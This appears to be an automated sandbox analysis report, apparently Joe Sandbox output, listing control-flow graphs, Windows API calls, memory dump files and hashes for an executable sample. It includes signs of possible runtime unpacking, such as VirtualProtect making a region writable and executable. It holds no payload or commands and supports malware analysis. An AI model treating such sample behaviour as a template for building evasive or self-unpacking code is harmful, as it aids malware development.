                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,006E3B32,?,006E3D94), ref: 006ECCDA
                                                                                                                                      • GetLastError.KERNEL32(?,006E3B32,?,006E3D94,?,006E3D94,?,?,?,?,?,?,?,?,?,?), ref: 006ECCE4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2915228174-0
                                                                                                                                      • Opcode ID: 285c1b5e40eb4447c3b026676e985b9c4be3a8c79f966facc28b528b8e2ae997
                                                                                                                                      • Instruction ID: 26235b9b5b2a0d047dfaf01531332eee88565290a50a3a738aac7b8a58097cfd
                                                                                                                                      • Opcode Fuzzy Hash: 285c1b5e40eb4447c3b026676e985b9c4be3a8c79f966facc28b528b8e2ae997
                                                                                                                                      • Instruction Fuzzy Hash: 8A61B3B1901289AFDF11CFA9CC45AEEBFBBAF59714F140159E804AB251D332D913CB90

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 216 6e1930-6e1933 217 6e1942-6e1945 call 6e6728 216->217 219 6e194a-6e194d 217->219 220 6e194f-6e1950 219->220 221 6e1935-6e1940 call 6e5761 219->221 221->217 224 6e1951-6e1955 221->224 225 6e195b-6e1ae6 call 6e19e7 call 6e277e 224->225 226 6e1ae7-6e1b17 call 6e1ab2 call 6e277e IsProcessorFeaturePresent 224->226 225->226 237 6e1b1e-6e1bfe call 6e1bff 226->237 238 6e1b19-6e1b1c 226->238 238->237
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E1B0F
                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 006E1BF7
                                                                                                                                        • Part of subcall function 006E277E: RaiseException.KERNEL32(E06D7363,00000001,00000003,006E1807,?,?,?,006E1A2F,006E1807,006FB3D4,?,006E1807,string too long,006E1236), ref: 006E27DF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3749517692-0
                                                                                                                                      • Opcode ID: ed4e447b9baf76ce52f0e00a8e56463e6a5f6e2acf770655bea2ec650a0f6241
                                                                                                                                      • Instruction ID: f14b1d0e6bc55bfbef4c9eda687395b6e271b37f8228b5e9ae6c23ba56061180
                                                                                                                                      • Opcode Fuzzy Hash: ed4e447b9baf76ce52f0e00a8e56463e6a5f6e2acf770655bea2ec650a0f6241
                                                                                                                                      • Instruction Fuzzy Hash: 0E3163B5505308EBD700DF69FD55B687BBBBB09310F10602AE904DB3E1EB70A586DB44

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 241 6ed32e-6ed383 call 6f1750 244 6ed3f8-6ed408 call 6e19a4 241->244 245 6ed385 241->245 246 6ed38b 245->246 248 6ed391-6ed393 246->248 250 6ed3ad-6ed3d2 WriteFile 248->250 251 6ed395-6ed39a 248->251 254 6ed3d4-6ed3df 250->254 255 6ed3f0-6ed3f6 GetLastError 250->255 252 6ed39c-6ed3a2 251->252 253 6ed3a3-6ed3ab 251->253 252->253 253->248 253->250 254->244 256 6ed3e1-6ed3ec 254->256 255->244 256->246 257 6ed3ee 256->257 257->244
                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,006ECCC0,?,006E3D94,?,?,?,00000000), ref: 006ED3CA
                                                                                                                                      • GetLastError.KERNEL32(?,006ECCC0,?,006E3D94,?,?,?,00000000,?,?,?,?,?,006E3B32,?,006E3D94), ref: 006ED3F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 442123175-0
                                                                                                                                      • Opcode ID: b179c4e4b8a39c1e05e5bdab153a4a5a9c6f2f2fc0240b34eb1b92bbc8b35681
                                                                                                                                      • Instruction ID: 28a2ddab7ddb9afae0156b38b162d08d77c99fdcbebf7bf3e340c469d3b9f2f0
                                                                                                                                      • Opcode Fuzzy Hash: b179c4e4b8a39c1e05e5bdab153a4a5a9c6f2f2fc0240b34eb1b92bbc8b35681
                                                                                                                                      • Instruction Fuzzy Hash: 5F219474A012599FCF19CF1ADC809EDB7BAEF49301F2440A9E946D7211D630ED46CB61

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 258 6e79c3-6e79c8 259 6e79ca-6e79e2 258->259 260 6e79e4-6e79e8 259->260 261 6e79f0-6e79f9 259->261 260->261 262 6e79ea-6e79ee 260->262 263 6e7a0b 261->263 264 6e79fb-6e79fe 261->264 265 6e7a65-6e7a69 262->265 268 6e7a0d-6e7a1a GetStdHandle 263->268 266 6e7a07-6e7a09 264->266 267 6e7a00-6e7a05 264->267 265->259 269 6e7a6f-6e7a72 265->269 266->268 267->268 270 6e7a1c-6e7a1e 268->270 271 6e7a47-6e7a59 268->271 270->271 273 6e7a20-6e7a29 GetFileType 270->273 271->265 272 6e7a5b-6e7a5e 271->272 272->265 273->271 274 6e7a2b-6e7a34 273->274 275 6e7a3c-6e7a3f 274->275 276 6e7a36-6e7a3a 274->276 275->265 277 6e7a41-6e7a45 275->277 276->265 277->265
                                                                                                                                      APIs
                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006E78B2,006FB6B8,0000000C), ref: 006E7A0F
                                                                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006E78B2,006FB6B8,0000000C), ref: 006E7A21
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHandleType
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                      • Opcode ID: 61936bde096a8634d75bc18ea37173b07b1125449f34c37ff7f25b9250874cf0
                                                                                                                                      • Instruction ID: 8bb621d59a04caee4f039e6f134855d4238f60018bf5be597422e5ddbad5e5fa
                                                                                                                                      • Opcode Fuzzy Hash: 61936bde096a8634d75bc18ea37173b07b1125449f34c37ff7f25b9250874cf0
                                                                                                                                      • Instruction Fuzzy Hash: A211B97110D7C146C7354E3F9C8867ABA97AB56330B380729D0B6867F1D634DB86E251

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • FreeConsole.KERNELBASE ref: 006E1540
                                                                                                                                        • Part of subcall function 006E123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 006E13BC
                                                                                                                                        • Part of subcall function 006E123B: CloseFigure.GDI32(00000000), ref: 006E13C3
                                                                                                                                      • VirtualProtect.KERNELBASE(006FC011,00000549,00000040,?), ref: 006E158C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseConsoleDispatcherExceptionFigureFreeProtectUserVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3716559696-0
                                                                                                                                      • Opcode ID: 5fea51e07bcca18b534ce57ab5f0a610247733bfc410fb48a5d2100c68b76b75
                                                                                                                                      • Instruction ID: 9222472746e73f08306e175a94de7f3720335a32e7b16b97e0d0ec92ef6bcfaf
                                                                                                                                      • Opcode Fuzzy Hash: 5fea51e07bcca18b534ce57ab5f0a610247733bfc410fb48a5d2100c68b76b75
                                                                                                                                      • Instruction Fuzzy Hash: 2F112C71E0120C6BDB00AF65CC42EFFB77AEF85310F400029F604BB281E9759D429795

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 291 6e8352-6e835b 292 6e835d-6e8370 RtlFreeHeap 291->292 293 6e838a-6e838b 291->293 292->293 294 6e8372-6e8389 GetLastError call 6e8b4e call 6e8b05 292->294 294->293
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,006EA687,?,00000000,?,?,006EA5A3,?,00000007,?,?,006EAB6E,?,?), ref: 006E8368
                                                                                                                                      • GetLastError.KERNEL32(?,?,006EA687,?,00000000,?,?,006EA5A3,?,00000007,?,?,006EAB6E,?,?), ref: 006E8373
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                      • Opcode ID: a6aebb505065be50af43bf3494a41482d16127901aa6675aea2b0c4cba6e5481
                                                                                                                                      • Instruction ID: 68d1e87b5dc39235eb7691990af13607fec6dfec022048a9115ea88c1865e6bc
                                                                                                                                      • Opcode Fuzzy Hash: a6aebb505065be50af43bf3494a41482d16127901aa6675aea2b0c4cba6e5481
                                                                                                                                      • Instruction Fuzzy Hash: 90E08CB2101344AFCB112FE2EC09BA93AABEB44792F144024F60DDB1A0DE358840CB85

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 299 6e70b0-6e70da 300 6e70dc-6e70de 299->300 301 6e70e0-6e70e2 299->301 302 6e7131-6e7134 300->302 303 6e70e8-6e70ef call 6e6fe5 301->303 304 6e70e4-6e70e6 301->304 306 6e70f4-6e70f8 303->306 304->302 307 6e70fa-6e7108 GetProcAddress 306->307 308 6e7117-6e712e 306->308 307->308 309 6e710a-6e7115 call 6e3457 307->309 310 6e7130 308->310 309->310 310->302
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f362f76dca404dd12ae568b4bb4243bc908efda982072eb420a8d3b49cd12de3
                                                                                                                                      • Instruction ID: cb1cc88577f8543c47d13c002969467018ce189e2cc7571e79860944da38b1cc
                                                                                                                                      • Opcode Fuzzy Hash: f362f76dca404dd12ae568b4bb4243bc908efda982072eb420a8d3b49cd12de3
                                                                                                                                      • Instruction Fuzzy Hash: 6601D837609359AFDF028F6AEC459BA37A7FBC13707296128F505DB298DA31D801D790

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 313 6e8cfd-6e8d09 314 6e8d3b-6e8d46 call 6e8b05 313->314 315 6e8d0b-6e8d0d 313->315 322 6e8d48-6e8d4a 314->322 317 6e8d0f-6e8d10 315->317 318 6e8d26-6e8d37 RtlAllocateHeap 315->318 317->318 319 6e8d39 318->319 320 6e8d12-6e8d19 call 6e66d7 318->320 319->322 320->314 325 6e8d1b-6e8d24 call 6e5761 320->325 325->314 325->318
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,006E1A21,006E1807,?,006E29D3,006E1809,006E1807,?,?,?,006E19DE,006E1A21,006E180B,006E1807,006E1807,006E1807), ref: 006E8D2F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 3c21768638ad634141d2f0e519e5816adc8a7d865be09f256fb05e921a9df09e
                                                                                                                                      • Instruction ID: 0eea002a58cc54a84141c4dd77cc87d496b45cbff4605d853b3434524a11bf2c
                                                                                                                                      • Opcode Fuzzy Hash: 3c21768638ad634141d2f0e519e5816adc8a7d865be09f256fb05e921a9df09e
                                                                                                                                      • Instruction Fuzzy Hash: 97E065311033E45FDB213A679C05B9B3A4B9F617E0F250514EC0DA72D0DF60DC01C6A5
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                      • Opcode ID: 152bc8cf6a6231a9b06cc2df189bba95eabeeb9f19b5660d97163df900ae4e04
                                                                                                                                      • Instruction ID: ad349ad669a65b739aeb1041558951550d5efa94c3a8c584faf0ed6b89691eda
                                                                                                                                      • Opcode Fuzzy Hash: 152bc8cf6a6231a9b06cc2df189bba95eabeeb9f19b5660d97163df900ae4e04
                                                                                                                                      • Instruction Fuzzy Hash: 13D24771E0A2698FDB64CF29CD407EAB7B6EB44304F1441EAD40DE7240EB79AE858F41
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 96fd936941ea14c40cf15aa7d7a94fca463f635fe71879e8aa3b6861b8ead67f
                                                                                                                                      • Instruction ID: c0cb48cc56888c62f1f07bd9d3da6a03155c221ec057f02189b21e7519008ebe
                                                                                                                                      • Opcode Fuzzy Hash: 96fd936941ea14c40cf15aa7d7a94fca463f635fe71879e8aa3b6861b8ead67f
                                                                                                                                      • Instruction Fuzzy Hash: 79023C71E012599FDF14CFA9D8806EEBBF2FF48314F248269D519E7381D731AA068B94
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EB2CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                      • Opcode ID: 761ecdda4722d893ddc399083313a51a962e82f5bc23cf5e475a7dd2ae72120d
                                                                                                                                      • Instruction ID: 5dfc03f4cc2648900493a3115fbd873daac004b72b4fd144b60281ced0a83012
                                                                                                                                      • Opcode Fuzzy Hash: 761ecdda4722d893ddc399083313a51a962e82f5bc23cf5e475a7dd2ae72120d
                                                                                                                                      • Instruction Fuzzy Hash: 5771F471C063989FDF21AF698C89AFEB7BAAF05300F1851D9E04C93251DB304E859F14
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006E2243
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 006E230F
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E2328
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 006E2332
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 06d7a119bd63e8690daf102b7eb9d64935ddc6679faf571e36643d41dba4d9d8
                                                                                                                                      • Instruction ID: 0d66a2568fdc5de7e3b4e9385323c33eca9f0acd0bfcbb97d7e4ea28ed04adb1
                                                                                                                                      • Opcode Fuzzy Hash: 06d7a119bd63e8690daf102b7eb9d64935ddc6679faf571e36643d41dba4d9d8
                                                                                                                                      • Instruction Fuzzy Hash: DB3123B5C02329DADB20DFA1D8497CDBBB9AF08300F1041EAE50CAB250EB719B85CF45
                                                                                                                                      APIs
                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006E2125
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 006E2134
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 006E213D
                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 006E214A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
